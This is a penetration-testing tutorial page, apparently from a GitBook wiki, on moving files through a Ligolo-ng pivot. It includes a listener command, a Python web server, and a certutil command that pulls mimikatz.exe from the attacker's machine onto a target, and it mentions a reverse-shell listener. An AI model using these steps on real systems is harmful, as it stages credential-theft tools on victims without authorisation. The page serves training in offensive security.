Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  1. Network Pivoting, Port Forwarding, and Tunneling
  2. Pivoting
  3. Ligolo-ng

Transferring Files through Pivot

Here’s how you can set up another listener on a different port to forward traffic to a web server, and then use it to transfer files through a pivot:

Step 1: Create Another Listener for Port 80

To set up a dedicated listener for port 80, which is typically used for web traffic, you can add another listener. This will be used for your Python3 web server.

  1. Listener Add Command:

    listener_add --addr 0.0.0.0:1235 --to 127.0.0.1:80

    • This command tells the pivot machine to listen for incoming traffic on port 1235 and forward it to port 80 (localhost).

    • This second listener will act as a proxy for HTTP traffic (in this case, to your web server).

Step 2: Verify Both Listeners Are Active

You should now have two listeners running on the pivot machine:

  • One listener on port 2222 for the reverse shell.

  • Another listener on port 1235 for your web server (port 80).

You can check active listeners with:

  1. Check Active Listeners:

    listener_list

    This will show both listeners with the ports and their respective forwarding configuration.

Step 3: Set Up a Python Web Server on Port 80

On your Kali machine (or the machine where you want to serve files), you can run a Python3 HTTP server on port 80. This is where files like mimikatz.exe or WinPeas.exe can be served.

  1. Start a Python3 HTTP Server on Port 80:

    python3 -m http.server 80

    This will serve files from the directory you run the command in on port 80.

Step 4: Transfer Files Using Certutil

Now that you have your second listener set up and your web server running, you can use the certutil tool on the target machine to download files through the pivot.

  1. Transfer File from the Web Server: On the target machine, use the following command to download a file (e.g., mimikatz.exe) from your Python HTTP server:

    certutil -urlcache -f http://10.129.229.129:1235/mimikatz.exe mimikatz.exe

    • 10.129.229.129 is the IP address of your pivot machine.

    • port 1235 is the port where your second listener is forwarding traffic to port 80.

    • mimikatz.exe is the file you want to download and save on the target machine.

    This command will connect back to your Kali machine on port 1235, which will forward traffic to port 80 where your Python HTTP server is serving mimikatz.exe.

Step 5: Verify the File Transfer

After running the above command, mimikatz.exe (or any other file you choose to serve) will be transferred to the target machine.

  • You can use other tools like WinPeas in the same way by changing the file path.

PreviousSetup Reverse Shells through PivotNextPivoting: Using Remote Desktop

Last updated 2 months ago